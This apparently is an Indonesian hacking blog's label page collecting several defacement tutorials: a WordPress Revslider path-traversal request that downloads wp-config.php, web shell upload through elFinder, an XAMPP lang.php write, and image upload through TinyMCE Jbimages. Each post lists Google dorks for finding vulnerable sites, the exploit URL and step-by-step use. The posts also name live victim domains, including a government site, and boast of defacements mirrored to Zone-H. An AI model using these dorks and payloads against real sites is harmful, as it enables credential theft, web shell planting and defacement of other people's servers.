Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Naufal Ardhani - Halo sobat kali ini saya akan membahas Exploit Wordpress Revslider Arbritary File Download pada exploit ini anda dapat mendownload file file penting yang ada di dalam server web tersebut khususnya web yang menggunakan cms Wordpress tapi tidak semua web yang menggunakan cms tersebut rentan dengan exploit ini.

Menurut hasil yang saya dapatkan dari Exploit DB exploit ini ditemukan oleh Claudio Viviani pada tahun 2014, ia merupakan pemilik blog https://www.homelab.it/ yang berisi tentang security.



Dork :

  • inurl:wp-content/plugins/revslider/
  • inurl:revslider
  • inurl:revslider_admin.php
  • inurl:revslider_front.php
  • inurl:plugins/revslider/
  • intext:Powered by Revslider
  • intitle:"Index Of/ revslider"
  • intitle:"Index Of/wp-content/themes/revslider"
  • intitle:"Index Of/wp-content/plugins/revslider"
  • intitle:"Index Of/admin/revslider"
  • intitle:"Index Of/fr/revslider"
  • intitle:"Index Of/en/revslider"
  • intitle:"Index Of/us/revslider"
  • intitle:"Index Of/ar/revslider"
  • intitle:"Index Of/es/revslider"
  • intitle:"Index Of/de/revslider"
Exploit :
  • /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

Step :
  1. Dorking dengan dork yang sudah disediakan.
  2. Disini saya sudah memiliki target yang vuln/rentan tinggal kasih exploit, contoh : http://site.co.id/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
  3. Dan jika berhasil admin-ajax.php terdownload lalu buka dengan text editor.

Sekian saja Exploit Wordpress Revslider Arbitary File Download Vulnerability yang saya bagikan semoga bermanfaat dan saya tidak bertanggung atas apa yang anda lakukan terimakasih.
Naufal Ardhani - Hallo gaess kali ini gua bakal bagiin Tutorial Deface elFinder + Upload Shell, Exploit ini sudah cukup lama ya tapi masih ada aja website yang masih vuln dengan exploit ini :v
dan pas gua lagi Pentest web http://labuankec.pandeglangkab.go.id/ gua nemuin directory /elFinder/ dan langsung aja gua upload shell dan bugnya dah ditambel.

Dork :

  • inurl:elfinder/elfinder.php.html ( dork kembangin lagi ya biar dapet yang vuln )
Exploit :
  • www.site.com/[path]/elfinder/elfinder.php.html
Live Target : http://labuankec.pandeglangkab.go.id/


Step :
  1. Dorking di google, pilih target dan kasih exploit satu satu
  2. dan Disini gua pake Live Target dan beri exploitnya : https://labuankec.pandeglangkab.go.id/SysAdminBasTek/scripts/elfinder/elfinder.php.html
  3. Langsung aja Upload Shell dengan ekstensi .phtml 
  4. lalu Akses deh Shellnya di www.site.com/[path]/elfinder/files/oxy.phtml


Sekian Tutorial Deface elFinder + Upload Shell semoga bermanfaat ilmunya.

nb : saya tidak bertanggung jawab atas apa yang kalian telah lakukan karna saya hanya membagikan ilmu untuk membantu admin web :3
Naufal Ardhani - Kali in saya akan memberikan Tutorial Deface Xampp Local Write Access, POC ini sedang banyak dipakai oleh defacer defacer karna apa? ntah lah :v karna saya cuma liat show off defacer di grup grup yang ada dan apa keuntunganya? hemmm... keuntungannya ialah bisa mirror di Zone-H :)



Oke Langsung aja

-Dork

  • inurl:/security/lang.php
  • inurl:/xampp/lang.php
-Exploit
  • /xampp/lang.php?Hacked_By_E4OXY ( untuk dir xampp )
  • /security/lang.php?Hacked_By_E4OXY ( untuk dir security )
-Preview
  • /xampp/lang.tmp ( untuk dir xampp )
  • /security/lang.tmp ( untuk dir security )
-Step
  1. Dorking dulu, kalau saya menggunakan dork "inurl:/security/lang.php intext:xampp",Tutorial Deface Xampp Local Write Access
  2. Beri Exploitnya, contoh "/security/lang.php?Hacked_By_E4OXY" (karna disini saya pakai dork yang inurl:security/lang.php jadi exploitnya juga di dir security),
  3. Jika berhasil akan seperti gambar dibawah,
  4. Untuk Preview hasilnya tinggal beri "/security/lang.tmp", contoh http://vega-apache.ingeneo.co/security/lang.tmp
    Tutorial Deface Xampp Local Write Access
Hasil saya :
http://www.mp-mall.com.hk/security/lang.tmp
http://www.moghulisran.com/security/lang.tmp
http://www.altebagestion.net/security/lang.tmp
http://vega-apache.ingeneo.co/security/lang.tmp

SEKIAN WASSALAM :)
Hasil gambar untuk Garuda Tersakti 72



Naufal Ardhani - Hello, kali ini saya akan membagikan Artikel Deface Jbimages TinyMCE Combine 3.04 Vulnerability, method ini banyak sekali target web indonesia akan tetapi sesuai dengan judul method ini hanya bisa upload gambar.


|~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~|
|+~+~+~+~+~+~+~+~+~+~+~+~+~+~~++~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+|
[+]Exploit Title: Jbimages TinyMCE Combine 3.04 Vulnerability
[+]Vendor: http://combine.or.id/
[+]Author: ./E4OXY
[+]Team: Garuda Tersakti 72
[+]Goolge Dork:
 [~]"index of jbimages/ site:id"
 [~]"intext:Powered By combine.or.id"
[+]Exploit:
 [~]/assets/tiny_mce/plugins/jbimages/dialog-v4.htm
[+]Tested on: Mac os X
[+]Live Target:
 [~]sendangadi-sleman.sid.web.id
 [~] www.kelurahan-kampungbaru.info
|~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~|
|+~+~+~+~+~+~+~+~+~+~+~+~+~+~~++~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+|

[+]Step
 [1]Dorking, pilih salah satu web.
 [2]Kasih Exploit, setelah di kasih tampilan akan berubah.
 [3]Lalu upload gambar dengan ext : png/jpg, kalau succes akan muncul tulisan "Upload Complete"
 [4]Untuk Melihat Hasil Upload.
     [~]www.site.com/assets/images/name.jpg
     [~]www.site.com/assets/images/Your_image.png
 [5]Mirrorin deh :)


Screenshot :



[+]Greetz :
 [~] [ TN72 ] [ ./GH05TW1BL3 ] [ DarkOct02 ] [ xCy4n ]  [ M1NT_1X ] [ Cy#b3r0ne ]
       [ Sese15 ] [ Yukki666 ] [ ./CE.19 ]


[~]Jangan gunakan untuk kesalahan!